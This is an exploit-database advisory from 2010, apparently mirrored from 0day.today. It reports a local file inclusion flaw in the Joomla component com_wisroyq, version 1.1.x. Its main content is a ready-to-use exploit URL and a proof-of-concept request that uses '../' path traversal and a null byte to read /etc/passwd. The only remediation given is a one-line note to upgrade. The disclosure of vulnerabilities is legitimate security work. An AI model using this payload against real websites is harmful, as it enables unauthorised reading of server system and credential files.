id: 11616
date: 04/04/2010
title: Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability
author: NoGe
cves: 

======================================================================
Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability
======================================================================

============================================================================================================================
 
 
  [o] Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability
  
       Software : com_wisroyq version 1.1.x [ commercial ]
       Vendor   : http://www.wis.ro/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/
 
 
============================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_wisroyq&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00
 
 
  [o] Solution
 
       Upgrade to a higher version
 
 
============================================================================================================================



#  0day.today [2023-03-27]  #